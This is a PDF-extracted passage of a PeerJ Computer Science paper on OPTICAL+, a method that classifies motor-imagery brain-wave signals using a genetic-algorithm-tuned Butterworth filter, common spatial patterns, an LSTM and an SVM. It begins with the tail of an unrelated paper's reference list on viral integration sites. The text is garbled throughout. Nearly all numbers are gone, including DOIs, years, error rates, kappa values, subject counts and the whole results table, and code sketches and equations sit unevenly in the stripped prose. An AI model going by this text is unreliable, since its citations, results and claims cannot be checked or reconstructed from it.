highly divergent integration profile of adeno-associated virus serotype revealed by high-throughput sequencing. journal of virology ( ): – doi . /jvi. - . kent wj, sugnet cw, furey ts, roskin km, pringle tom h, zahler am, haussler d. . the human genome browser at ucsc. genome research ( ): – doi . /gr. . krzywinski mi, schein je, birol i, connors j, gascoyne r, horsman d, jones sj, marra ma. . circos: an information aesthetic for comparative genomics. genome research ( ): – . lafave mc, varshney gk, gildea de, wolfsberg tg, baxevanis ad, burgess sm. . mlv integration site selection is driven by strong enhancers and active promoters. nucleic acids research ( ): – doi . /nar/gkt . li ma, pettitt sj, eckert s, ning z, rice s, cadianos j, yusa k, conte n, bradley a. . the piggybac transposon displays local and distant reintegration preferences and can cause mutations at noncanonical integration sites. molecular and cellular biology ( ): – doi . /mcb. - . li l, zhang d, li p, damaser m, zhang y. . virus integration and genome influence in approaches to stem cell based therapy for andro-urology. advanced drug delivery reviews – : – doi . /j.addr. . . . pingoud a, jeltsch a. . structure and function of type ii restriction endonucleases. nucleic acids research ( ): – doi . /nar/ . . . riviere i, dunbar ce, sadelain m. . hematopoietic stem cell engineering at a crossroads. blood ( ): – doi . /blood- - - . roadmap epigenomics consortium, kundaje a, meuleman w, ernst j, bilenky m, yen a, heravi-moussavi a, kheradpour p, zhang z, wang j, ziller mj, amin v, whitaker jw, schultz md, ward ld, sarkar a, quon g, sandstrom rs, eaton ml, wu y-c, pfenning ar, wang x, claussnitzer m, liu y, coarfa c, harris ra, shoresh n, epstein cb, gjoneska e, leung d, xie w, hawkins rd, lister r, menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /science. http://dx.doi.org/ . /nar/gkq http://dx.doi.org/ . /mt. . http://dx.doi.org/ . /jvi. - http://dx.doi.org/ . /gr. http://dx.doi.org/ . /nar/gkt http://dx.doi.org/ . /mcb. - http://dx.doi.org/ . /j.addr. . . http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /blood- - - http://dx.doi.org/ . /peerj-cs. hong c, gascard p, mungall aj, moore r, chuah e, tam a, canfield tk, hansen rs, kaul r, sabo pj, bansal ms, carles a, dixon jr, farh k-h, feizi s, karlic r, kim a-r, kulkarni a, li d, lowdon r, elliott g, mercer tr, neph sj, onuchic v, polak p, rajagopal n, ray p, sallari rc, siebenthall kt, sinnott-armstrong na, stevens m, thurman re, wu j, zhang b, zhou x, beaudet ae, boyer la, de jager pl, farnham pj, fisher sj, haussler d, jones sjm, li w, marra ma, mcmanus mt, sunyaev s, thomson ja, tlsty td, tsai l-h, wang wei, waterland ra, zhang mq, chadwick lh, bernstein be, costello jf, ecker jr, hirst m, meissner a, milosavljevic a, ren b, stamatoyannopoulos ja, wang t, kellis m. . integrative analysis of reference human epigenomes. nature ( ): – doi . /nature . robinson jt, thorvaldsdóttir h, winckler w, guttman m, lander es, getz g, mesirov jp. . integrative genomics viewer. nature biotechnology ( ): – doi . /nbt. . roth sl, malani n, bushman fd. . gammaretroviral integration into nucleosomal target dna in vivo. journal of virology ( ): – doi . /jvi. - . sandve gk, gundersen s, johansen m, glad i, gunathasan k, holden l, holden m, liestl k, nygrd s, nygaard v, paulsen j, rydbeck h, trengereid k, clancy t, drabls f, ferkingstad e, kala m, lien t, rye mb, frigessi a, hovig e. . 
the genomic hyperbrowser: an analysis web server for genome-scale data. nucleic acids research (w ):w –w doi . /nar/gkt . shao w, shan j, kearney mf, wu x, maldarelli f, mellors jw, luke b, coffin jm, hughes sh. . retrovirus integration database (rid): a public database for retroviral insertion sites into host genomes. retrovirology ( ):article doi . /s - - - . wilson mh, coates cj, george al. . piggybac transposon-mediated gene transfer in human cells. molecular therapy ( ): – doi . /sj.mt. . wu x, li y, crise b, burgess sm. . transcription start regions in the human genome are favored targets for mlv integration. science ( ): – doi . /science. . menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nature http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /jvi. - http://dx.doi.org/ . /nar/gkt http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /sj.mt. http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. optical+: a frequency-based deep learning scheme for recognizing brain wave signals optical+: a frequency-based deep learning scheme for recognizing brain wave signals shiu kumar , ronesh sharma and alok sharma , , school of electrical and electronic engineering, fiji national university, suva, fiji stemp, university of the south pacific, suva, fiji institute for integrated and intelligent systems, griffith university, brisbane, australia laboratory for medical science mathematics, riken center for integrative medical sciences, yokohama, kanagawa, japan abstract a human–computer interaction (hci) system can be used to detect different categories of the brain wave signals that can be beneficial for neurorehabilitation, seizure detection and sleep stage classification. research on developing hci systems using brain wave signals has progressed a lot over the years. however, real-time implementation, computational complexity and accuracy are still a concern. in this work, we address the problem of selecting the appropriate filtering frequency band while also achieving a good system performance by proposing a frequency-based approach using long short-term memory network (lstm) for recognizing different brain wave signals. adaptive filtering using genetic algorithm is incorporated for a hybrid system utilizing common spatial pattern and lstm network. the proposed method (optical+) achieved an overall average classification error rate of . % and a kappa coefficient value of . , outperforming the state-of-the-art methods. the proposed optical+ predictor can be used to develop improved hci systems that will aid in neurorehabilitation and may also be beneficial for sleep stage classification and seizure detection. subjects human-computer interaction, artificial intelligence, brain-computer interface keywords human-computer interaction (hci), brain wave, long short-term memory (lstm), common spatial pattern (csp), motor imagery (mi), informative frequency band (ifb) introduction a human–computer interaction (hci) system uses cutting-edge techniques for establishing direct communication between the human brain and a computer (li et al., ). hci has gained tremendous attention over the recent years with the major focus being in gaming and biomedical applications. an hci system, also widely known as a brain–computer interface (bci) system, converts the mental state (brain waves) of humans into computer commands which can be used by the disabled people to recover their environmental control capabilities (wang et al., ). 
it can also be used to detect pre-seizure activities (zhou et al., ) and sleep stages (yulita et al., ). the human brain waves are usually captured using electroencephalography (eeg) sensors, with non-invasive sensors preferred over invasive sensors due to the fact that surgery is required for invasive sensors and those non-invasive sensors can be integrated into wearable devices (mullen et al., ). however, the drawback of using non-invasive sensors is that it is how to cite this article kumar s, sharma r, sharma a. . optical+: a frequency-based deep learning scheme for recognizing brain wave signals. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted january published february corresponding author shiu kumar, shiu.kumar@fnu.ac.fj academic editor robertas damaševičius additional information and declarations can be found on page doi . /peerj-cs. copyright kumar et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:shiu.�kumar@�fnu.�ac.�fj https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ prone to environmental noise, which results in the captured signal having a low signal-to- noise ratio (snr). therefore, it becomes quite a challenging task to recognize different categories of brain wave signals with high accuracy. the automatic classification of eeg signals is a significant step towards making the use of eeg more practical in applications and less dependent on the experts. the electrical potentials generated by the brain for different specific tasks are recorded from the scalp using eeg sensors. these signals are well structured, which makes it appropriate for machine learning. thus, a vast number of researchers have explored or proposed various traditional methods (abibullaev & zollanvari, ; borhani et al., ; chowdhury et al., ; jiao et al., ; kumar, sharma & tsunoda, a, b; mumtaz et al., ; utsumi et al., ; wang et al., ; xing et al., ; xu et al., ; zhang et al., ) aiming to build a system that has low complexity and a high recognition rate for classification of the brain wave signals. brain wave signals have gained recognition for a number of applications such as neuro-rehabilitation (chowdhury et al., ; neurostyle, ; zeng et al., ), sleep-stage classification (radha et al., ; xu et al., ), seizure detection (gao et al., ; zhou & li, ), emotion recognition (liu et al., ; yang et al., ) and biometric recognition where identification of individuals is done using their brain wave signals. for example, in damaševičius et al. ( ) the authors have proposed a biometric system that combines cryptography with eeg signals for recognizing different individuals. several authors have also explored the possibilities of data compression (rajasekar & pushpalatha, ) for reducing the bandwidth required in data transfer and feature selection or reduction approaches such as wave atom transform (martisius et al., ), feature selection using f-statistic values (peng et al., ) and locally-robust feature selection approach (yin et al., ). common spatial pattern (csp) and its variants (cheng, lu & wang, ; ramoser, muller-gerking & pfurtscheller, ) are the prevailing feature extraction methods for motor imagery (mi) eeg signal classification. 
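since csp is central to the pipeline discussed here, a minimal two-class formulation is sketched below; this is the generic textbook method (covariance averaging, a generalized eigendecomposition and log-variance features), not the authors' code, and the function names and the choice of m filters per class are illustrative assumptions.

import numpy as np
from scipy.linalg import eigh

def csp_filters(trials_a, trials_b, m=3):
    # trials_*: lists of band-pass filtered trials, each of shape (channels, samples)
    mean_cov = lambda trials: np.mean([np.cov(t) for t in trials], axis=0)
    ca, cb = mean_cov(trials_a), mean_cov(trials_b)
    # generalized eigenproblem Ca w = lambda (Ca + Cb) w; the extreme eigenvectors
    # maximize variance for one class while minimizing it for the other
    vals, vecs = eigh(ca, ca + cb)
    w = vecs[:, np.argsort(vals)[::-1]].T          # rows are spatial filters
    return np.vstack([w[:m], w[-m:]])

def csp_features(trial, filters):
    # normalized log-variance of the spatially filtered trial
    z = filters @ trial
    var = z.var(axis=1)
    return np.log(var / var.sum())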
filter bank csp (fbcsp) (ang et al., ), discriminative fbcsp (dfbcsp) (thomas et al., ), sparse filter band csp (sfbcsp) (zhang et al., ), and binary particle swarm optimization approach for frequency band selection (wei & wei, ) are few of the methods that utilize csp for feature extraction. these methods have focused on using multiple filter bands and in some cases finding individual-dependent frequency bands that would produce good classification ability. several other approaches have also been proposed using csp for extracting potentially significant features from the eeg signals after performing certain analysis. however, the eeg features vary over time and differ significantly in different individuals (blankertz et al., ). thus, there has been an ever-increasing demand for robust and more general feature extraction techniques. a number of approaches have been proposed based on deep learning (convolutional neural networks—cnn (wu et al., ; yuksel & olmez, ) and long short-term memory network (lstm) (kumar, sharma & tsunoda, a)), feature priority and selection (li & feng, ; luo et al., ), empirical mode decomposition (gaur et al., ; mingai et al., ), wavelet packet decomposition (yang et al., ), hjorth parameters (türk et al., ), tangent space mapping (kumar, mamun & sharma, ) kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and channel selection (ghaemi et al., ). while these approaches have aimed to increase the classification accuracy to some extent, their performance is still limited because the eeg signals acquired from the scalp using non-invasive sensors usually have low snr. a signal with low snr contains a lot of unwanted noise which degrades the performance of an algorithm in recognizing the different categories of the brain wave signals. one way to obtain an eeg signal with better quality, that is, a signal with good snr is by using invasive sensors. however, invasive sensors require surgery, which is not preferred by many people and is rarely used for hci applications. therefore, there is a need to enhance the quality of the signal acquired using non-invasive sensors such that it contains useful information that can aid in recognizing the different categories of the mi eeg signals. several methods have been proposed for artifact removal, amongst which is a recently proposed movement artifact removal approach for eeg analysis in sports exercise (butkevičiūtė et al., ). however, one of the simple methods to remove the artifacts or unwanted noise is by filtering. the responsive frequency band differs from one individual to another (ang et al., ; kumar, sharma & tsunoda, ; novi et al., ; poli, kennedy & blackwell, ) due to different skull size, skin thickness and the fact that the way one individual thinks about a task differs from the way another individual thinks about the same task. therefore, using a fixed filter band will not produce a signal of the best quality. moreover, manually tuning the filter bank for each individual is a tedious and time-consuming task. thus, a method that automatically finds the subject-dependent filter band that will produce the most responsive signal is desired. the authors in wei & wei ( ) have employed binary particle swarm optimization algorithm for selecting the best frequency band(s) from overlapping sub-bands for the classification of motor imagery eeg signals. 
although performance improvement has been achieved, multiple sub-bands can be selected which will increase the computation time of the system. on the other hand, the sub-bands are pre-defined and as such this approach might ignore some important information. in wodecki, michalak & zimroz ( ), the authors have used progressive genetic algorithm (ga) for optimal filter design for vibration signal analysis. the informative frequency band (ifb) that contains the most information about the damage depends on many factors, such as kinematic structure, operational conditions, type of damage and its location within the machine and thus the progressive ga algorithm has been proposed for finding the ifb. the filter coefficients of a linear phase digital finite impulse response filter is optimized with no restriction on the search space of the filter coefficients, which will increase the time taken to search for the optimal filter. therefore, in order to address these issues, we propose a simple yet an effective adaptive filtering approach to obtain the signal that is of the best quality and combine it with our previous work (kumar, sharma & tsunoda, a) to obtain a predictor called optical+ which is able to outperform the state-of-the-art methods. in optical+, we use ga to optimize the parameters of a butterworth bandpass filter, which finds the most ifb for each individual using which the most responsive signal can be obtained. filtering the signal using this frequency band aids in reducing the unwanted noise while retaining the useful information contained in the signal. thus, a signal that captures most of the useful information needed to recognize the different categories of kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mi-eeg signals will be obtained. this helps in obtaining features that are discriminative. after filtering, the features generated using csp and lstm are used to train a support vector machine (svm) classifier. this trained svm model is then used to classify the test samples. the contributions of this work can be summarized as follows: � a single adaptive butterworth filter is employed that is tuned using the ga algorithm for finding the ifb specific to each individual, which results in an improved performance in terms of brain wave classification. the search space is kept to a minimum of three parameters (filter order and upper and lower cutoff frequencies) to be able to find the parameters of the adaptive filter in the shortest possible time. � the adaptive filter is integrated with the optical predictor, resulting in a new predictor named optical+, which can enhance the overall classification ability of the system. the proposed adaptive filter can be easily integrated with other methods to offer a better classification performance. the rest of the article is organized as follows. the next section describes the dataset used and the proposed method. the results are presented and discussed in “results and discussion”. finally, the paper ends with conclusions and future recommendations. materials and methods in this section, we present a brief description of the dataset that has been used to evaluate the proposed method, followed by a detailed description of the proposed optical+ predictor. dataset description the publicly available gigadb dataset (cho et al., ) has been used in this work. it contains eeg signals for mi tasks recorded from healthy subjects ( males and females). 
data was collected as previously described in kumar, sharma & tsunoda ( a). specifically, data was acquired at a sampling rate of hz using ag/agcl active electrodes placed around the scalp based on the international - system. the eeg signals were recorded for the following tasks: left and right hand mi tasks, eyeball movement left/right, eyeball movement up/down, eye blinking, jaw clenching, head movement, and rest state. for each subject, either or trials of each of the left and right hand mi tasks were recorded. out of the subjects, the data of subjects are well-discriminated while the remaining subject’s data is less discriminated. in this work, we have used the eeg signals for the left and right hand mi tasks. a detailed description of the dataset can be found online (cho et al., ). methods deep learning has been widely used in mi classification and has achieved satisfactory results. to make full use of the feature information, we propose a frequency-based approach embedded into the lstm network, while also making use of the commonly used csp approach for feature extraction. the overall framework of the proposed optical+ kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ predictor is shown in fig. . ga is first initialized with random parameters having a population size of . two sets of spatial filters are then learned from the training samples. the first set of spatial filters is learned directly from the original training samples, while the second set of spatial filters is learned using the segmented data as shown is fig. . csp features are then obtained from both the spatially filtered data. the csp features obtained from the first set of spatially filtered data becomes the first set of features to the svm model. on the other hand, the csp features extracted from the second set of spatially filtered data is fed as the sequence input to the lstm network for training the model. the output of the lstm network is a regression layer, which also becomes one of the features to the svm model. thus, the svm model is trained using the training samples and evaluated using the evaluation samples. during this process of ga searching for the best filter parameters, -fold cross-validation is used for training and evaluating the performance of the selected filter parameters. thus, the value of the fitness function is the average of the error rates obtained from the -folds. in this way, fitness function values are obtained (one for each chromosome) during each phase of the fitness function evaluation. the ga search is carried out for iterations unless an error rate of zero is achieved (in this case the search process of ga will stop) and the best parameters will be determined. once the three filter parameters have been determined, all the training data is filtered using the adaptive filter that is learned, the spatial filters are again computed and the lstm and svm model is retrained. these spatial filters and trained models are figure conceptual framework of the proposed optical+ predictor. full-size doi: . /peerj-cs. /fig- kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ then used during the test phase for classifying the new test samples. the following sub- sections present each of the phase of the proposed method in more detail. 
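to make the search procedure above concrete, the following python-style sketch outlines the ga-driven optimisation of the three filter parameters. it is an illustrative reconstruction rather than the authors' matlab implementation: the population size, iteration count, parameter bounds and the callable error_rate() are assumptions introduced for the example, with error_rate standing in for the cross-validated csp + lstm + svm error described above.

```python
# illustrative sketch of the ga-driven adaptive-filter search (not the authors' matlab code)
import numpy as np
from scipy.signal import butter, filtfilt

def bandpass(trial, order, f_low, f_high, fs):
    """Butterworth band-pass filter applied along the sample axis of a (channels, samples) trial."""
    b, a = butter(int(order), [f_low / (fs / 2.0), f_high / (fs / 2.0)], btype="band")
    return filtfilt(b, a, trial, axis=-1)

def ga_filter_search(error_rate, pop_size=20, n_iter=30, seed=0):
    """Search the three adaptive-filter parameters (order, lower cutoff, upper cutoff) with a simple GA.

    error_rate(order, f_low, f_high) -> float is supplied by the caller and stands in for the
    cross-validated CSP + LSTM + SVM error of the pipeline described above (a placeholder here)."""
    rng = np.random.default_rng(seed)
    lower = np.array([2.0, 0.5, 10.0])     # assumed lower bounds of the search space
    upper = np.array([8.0, 20.0, 45.0])    # assumed upper bounds of the search space

    def evaluate(c):
        order, lo, hi = c
        return 1.0 if lo >= hi else error_rate(int(round(order)), lo, hi)

    def tournament(pop, fit):
        idx = rng.choice(len(pop), 3, replace=False)      # size-3 tournament selection
        return pop[idx[np.argmin(fit[idx])]]

    pop = rng.uniform(lower, upper, size=(pop_size, 3))
    fit = np.array([evaluate(c) for c in pop])
    for _ in range(n_iter):
        children = []
        for _ in range(pop_size):
            w = rng.random()
            child = w * tournament(pop, fit) + (1.0 - w) * tournament(pop, fit)  # arithmetic cross-over
            child += rng.normal(0.0, 0.5, size=3)                                # gaussian mutation
            children.append(np.clip(child, lower, upper))
        pop = np.array(children)
        fit = np.array([evaluate(c) for c in pop])
        if fit.min() == 0.0:               # stop early if a zero error rate is reached, as above
            break
    best = pop[fit.argmin()]
    return int(round(best[0])), float(best[1]), float(best[2])
```

in use, the returned (order, lower cutoff, upper cutoff) triple would be applied to all training data with bandpass() before the spatial filters and the lstm and svm models are retrained, mirroring the procedure described above.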
adaptive filtering pre-processing the signals to obtain a clean signal is a fundamental concept for any signal processing approach. one of the key methods of obtaining a good quality eeg signal from the raw eeg data is through filtering. the eeg signal that will contain important mi task information usually lies between . hz and hz. however, the actual frequency range that will provide important information about the different mi tasks varies amongst different individuals. this fact paves the way to develop methods that can automatically learn or find the ifb. while the use of multiple frequency bands has been proposed (ang et al., ; thomas et al., ), it increases the computational complexity of the system. therefore, we propose the use of a single adaptive filter band using ga. the bandpass butterworth filter has been utilized in this work due to the lower number of parameters that needs to be selected, which keeps the search space small. however, other filters can also be used with our proposed method. the three parameters that were tuned for the adaptive filter were the filter order, upper cutoff frequency and lower cutoff frequency. -fold cross-validation is performed on training data to search for the filter parameters that would result in the optimal performance of the proposed system. the adaptive filter parameters found are then used to filter the test data. genetic algorithm genetic algorithm (ga) is an iterative search procedure based on natural selection and genetics that is widely used for optimization and search problems. a d dimensional population of chromosomes representing the possible solutions is generated randomly, where d depends on the number of parameters to be optimized. in this work, we optimized d = parameters (filter order, upper cutoff frequency and lower cutoff frequency). this first generation of the solutions is referred to as the parents. only a few parents are then selected, from which children are generated using the cross-over method. several methods such as roulette wheel selection, rank selection, tournament selection, stochastic universal sampling and random selection can be used for selecting the parents. we have utilized the tournament selection approach for selecting the parents. mutants are then formed by performing mutation on several randomly selected parents. the chromosomes that survive during the process of survivor selection become the parents in the next iteration. this process is repeated until the desired fitness condition or the desired number of iterations are reached. the chromosome that gives the best fitness value is selected and used to set the filter parameters of the adaptive filter for final training and testing. common spatial pattern common spatial pattern (csp) is one of the major approaches used for feature extraction of mi-eeg signals. it projects the signal onto a new time series, where the variance of one class of signals is maximized while the variance of the other class of signals is minimized. refer to kumar et al. ( ) for a detailed explanation of the csp algorithm. kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ given an input signal en rc � t, the spatially filtered signal can be obtained using ( ), where n represents the n-th trial, c represents the number of channels and t is the number of sample points. the csp variance-based features are then extracted using ( ), where êin represents the i-th row of ên. 
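before the expressions are stated formally in eqs. (1) and (2) below, the following numpy sketch shows one common way of computing csp spatial filters (via the generalised eigenvalue formulation) and the log-variance features; it is a generic illustration of the technique, not the authors' implementation, and the function names and the choice of m are assumptions made for the example.

```python
import numpy as np

def csp_filters(trials_a, trials_b, m=3):
    """Compute 2*m CSP spatial filters from two classes of (channels, samples) trials."""
    def avg_cov(trials):
        covs = []
        for x in trials:
            c = x @ x.T
            covs.append(c / np.trace(c))          # normalised spatial covariance of one trial
        return np.mean(covs, axis=0)

    ca, cb = avg_cov(trials_a), avg_cov(trials_b)
    # generalised eigenvalue problem: ca w = lambda (ca + cb) w
    eigvals, eigvecs = np.linalg.eig(np.linalg.solve(ca + cb, ca))
    order = np.argsort(eigvals.real)
    keep = np.concatenate([order[:m], order[-m:]])   # m most discriminative filters per class
    return eigvecs.real[:, keep].T                   # rows are spatial filters

def csp_features(trial, w_csp):
    """Projection followed by normalised log-variance features (cf. eqs. (1)-(2) below)."""
    z = w_csp @ trial                                # spatially filtered signal
    var = z.var(axis=1)
    return np.log(var / var.sum())
```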
in this work, we have selected spatial filters (m = ); therefore, csp variance-based features are obtained for each trial. the spatially filtered signal and the variance-based features are computed as

\hat{E}_n = W_{\mathrm{csp}}^{T} E_n \quad (1)

f_n^{i} = \log\!\left(\frac{\operatorname{var}(\hat{E}_n^{i})}{\sum_{j}\operatorname{var}(\hat{E}_n^{j})}\right) \quad (2)

where the sum in (2) runs over all of the selected spatial filters.

long short-term memory network
deep learning has been increasingly applied to real-life applications with good performance. deep learning methods such as convolutional neural networks are usually applied to image data, whereas recurrent neural networks (rnn) such as the lstm are used to learn from time-series data. an lstm network can store long-term information about a time series and later use it together with the current data to generate its output. the eeg signal comprises common temporal patterns when mi tasks are not being performed. therefore, non-temporal techniques may not achieve optimal performance, since they cannot exploit the dependency between time steps (i.e., current and past data) (radha et al., ). recurrent models such as the lstm tackle this problem, which normal rnns cannot, by retaining short-term dependencies over long periods of time. thus, we utilize an lstm network in this work, i.e., an rnn that contains an lstm layer. the lstm network architecture used in this work is shown in fig. : the input is a sequence input layer, followed by the lstm layers, a fully connected layer and a regression layer at the output. the sequence input layer provides the time series or sequence input to the network, and the lstm layer learns long-term dependencies between the steps of the sequence data. the lstm layer architecture used in this work is shown in fig. , which shows how the d-dimensional sequence input matrix f with a length of s flows through the lstm layer. f_i^{w_j} represents the sequence input, where i denotes the i-th feature obtained from the j-th windowed segment of the respective trial (details on how to obtain the sequence input matrix can be found in our previous work (kumar, sharma & tsunoda, a)). h and c denote the hidden/output states and the cell states, respectively. the initial state of the network and the first sequence input f_i^{w_1} become the input for the first lstm block, which computes the first output state h_1 and the updated cell state c_1.

[figure: the lstm network architecture used in the optical+ predictor — sequence input layer, first and second lstm layers, fully connected layer, and regression output layer.]

the lstm blocks between the first and the last block take the sequence input f_i^{w_t} and the current states of the network (c_{t-1}, h_{t-1}) and compute, for the t-th lstm block, the updated output state h_t and the updated cell state c_t. information learned from previous sequence inputs is contained in the cell states, and information is added to or removed from the cell states (with updates controlled by gates) at each step of the sequence input. an lstm architecture usually consists of four main parts: the input gate, the memory cell, the forget gate and the output gate. the values (states) are remembered or stored by the memory cells for either short or long times. the function of the input gate is to control the degree to which new data or information can flow into the cell of the lstm layer, the purpose of the forget gate is to control the degree to which a value or piece of information remains in the cell of the lstm layer, while the function of the output gate is to control the amount of stored information that is utilized for computing the output activation. fig. shows how the data flows through the lstm block for the t-th step of the input sequence. the input weights w, the recurrent weights r and the bias b are the weights learned by the lstm layer. the cell state at step t of the input sequence is calculated as

c_t = f_t \odot c_{t-1} + i_t \odot g_t

while the hidden/output state is calculated as

h_t = o_t \odot \sigma_c(c_t)

where i, f, g and o denote the input gate, forget gate, cell candidate and output gate, respectively. the \odot operator represents element-wise multiplication (the hadamard product) and \sigma_c denotes the state activation function.

[figure: the lstm layer architecture used in the optical+ predictor — the sequence inputs f_i^{w_1}, …, f_i^{w_s} flow through a chain of lstm blocks, starting from the initial states (h_0, c_0) and ending in the final updated states.]

[figure: flow of data through the lstm block for the t-th step of the input sequence (mathworks, ).]

each of the components at sequence input t is calculated using eqs. (3)–(6). the tangent hyperbolic function is used as the state activation function, \sigma_c(x) = \tanh(x), while the sigmoid function is used as the gate activation function, \sigma_g(x) = (1 + e^{-x})^{-1}.

i_t = \sigma_g(W_i x_t + R_i h_{t-1} + b_i) \quad (3)
f_t = \sigma_g(W_f x_t + R_f h_{t-1} + b_f) \quad (4)
g_t = \sigma_c(W_g x_t + R_g h_{t-1} + b_g) \quad (5)
o_t = \sigma_g(W_o x_t + R_o h_{t-1} + b_o) \quad (6)

results and discussion
in order to evaluate the feasibility and performance of the proposed system, experiments have been conducted using the gigadb dataset. these experiments are conducted using matlab running on a personal computer at . ghz with an intel(r) core(tm) i processor. the gigadb dataset is used to evaluate the proposed method as it has a large number of individuals ( individuals) and therefore generalizes well for comparing the performance of the different methods. we extracted a s window of the signal after the visual cue was presented to obtain the trial data for the different mi tasks (left hand and right hand), as done in other related works (cho et al., ; kumar & sharma, ; kumar, sharma & tsunoda, , b; zhang et al., ). basic pre-processing is performed, where common average referencing is applied to all the trials. the performance measures used to evaluate the proposed system are the error rate (the percentage of samples that are misclassified), sensitivity, specificity, and cohen's kappa index (κ). the error rate shows the percentage of trials that are incorrectly classified, the sensitivity and specificity show the ability of the classifier to correctly classify the positive and negative trials, respectively, and cohen's kappa index measures the reliability of the classifier, with a higher value signifying a more reliable system.

results
for a fair comparison, all the methods have been implemented and the results obtained using the × -fold cross-validation scheme are reported.
table shows the comparison of the × -fold cross-validation results of the proposed optical+ predictor with the other state-of-the-art methods. it can be noted from table that the proposed method outperformed all the other methods in terms of the error rate, sensitivity, specificity and κ. it shows that our proposed method is reliable and more robust as it achieved the highest κ value. our proposed method outperformed the top performing optical method by . %, . %, . %, and . % in terms of the error rate, kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sensitivity, specificity and κ, respectively. the results for the individual subjects can be found in the supplemental materials. out of the subjects, subjects achieved the lowest error rate using the proposed approach. this is the highest number of subjects achieving the lowest error rates using a particular method with i-dfbcsp achieving the second-highest number of subjects ( subjects) with the lowest error rates. compared to the optical method, the error rates for subjects improved using the optical+ method with the highest improvement being a % decrease in the error rate (subject ). we also present the results of the individual subjects for our proposed optical+ predictor in fig. , where the error bars represent the % confidence interval. the results of the individual subjects for the other competing methods can be found in the supplemental material. it can be noted that our proposed method achieved the lowest width of the % confidence interval for out of subjects. this number is higher than table × -fold cross-validation results of the different methods. method number of filters error rate sensitivity specificity κ csp . . . . dfbcsp [ ] . . . . sblfb [ ] . . . . csp-tsm [ ] . . . . sftofsrc [ ] . . . . ss-memdbf [ ] . . . . tfpo-csp [ ] . . . . i-dfbcsp [ ] . . . . optical [ ] . . . . optical+ . . . . etarrorre egatnecrep subject figure error rates of the individual subjects for the proposed optical+ predictor. full-size doi: . /peerj-cs. /fig- kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ that of any other competing methods. over % of the subjects have a width of % confidence interval of less than ± . %. this shows that our proposed method can produce similar results if repeated under the same conditions. thus, we can say that the proposed optical+ predictor is reliable as it achieved the lowest average width of % confidence interval showing that the proposed optical+ predictor has the lowest variation around its reported statistical mean. discussion the proposed optical+ predictor outperformed all the other state-of-the-art methods. the gigadb dataset has been used to evaluate all the methods as it has a large number of subjects ( subjects) and using this dataset shows the reliability and robustness of the approaches. reliability in this work specifically refers to the degree to which a test produces similar results under consistent conditions and robustness refers to the strength of the approach. it is worth noting that approaches such as dfbcsp, sftofsrc, csp-tsm and ss-memdbf have shown to perform well on small datasets (bci competition datasets). however, they did not perform well on the gigadb dataset. 
on the other hand, the proposed optical+ predictor generalized well compared to these methods, showing that it is a more reliable and robust predictor for predicting the mi-eeg signals since it achieved the highest κ value. we say that our proposed system is more reliable because it is able to generate similar results under consistent conditions obtaining the lowest average standard deviation of . in comparison with the other competing methods. on the other hand, we argue that our approach is more robust in comparison to other methods as it is able to perform well (obtaining lowest error rate) for a substantial number of subjects ( out of subjects). this is considerably higher than the other methods as the number of subjects for which the competing methods obtained the lowest error rate are as follows: csp— , sblfb— , tfpo-csp— , i-dfbcsp— and optical— . moreover, to show that the performance improvement achieved by our proposed optical+ predictor is significant, paired t-test with a significance level of . has been performed. the results of the individual subjects for the proposed optical+ predictor and the results of the individual subjects for the optical and tfpo-csp predictors have been used to perform the paired t-test. the p-values obtained were . and . , respectively. this indicates that a significant performance improvement has been achieved using the proposed optical+ predictor as the p-values obtained are < . . figure presents the distribution of the best two features for the csp , optical and the proposed optical+ method that was obtained using one of the trial runs of subject . it can noted from fig. that more separable features are obtained by the proposed optical+ predictor in comparison to the conventional csp and optical methods, thus, accounting for the enhanced performance of the proposed optical+ predictor. this is due to the optimization of the filter parameters, which results in the signal containing significant information while filtering out most of the redundant information. this leads to learning better csp spatial filters that project data onto a new time series kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure distribution of the best two csp features obtained using conventional csp approach and proposed method. full-size doi: . /peerj-cs. /fig- kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ which are more separable, thus resulting in improved performance. the spatial filters learned from one of the trial runs of subject are shown in fig. for with and without optimization of the filter parameters. figure demonstrates that the csp spatial filters learned when the filter parameters are optimized (optical+ spatial filters) were better than the csp spatial filters learned when the filter parameters were not optimized as figure the six spatial filters learned by the conventional csp approach (a–f) and the proposed optical+ predictor (g–l) for subject (for one of the trial runs). full-size doi: . /peerj-cs. /fig- kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ they were able to project 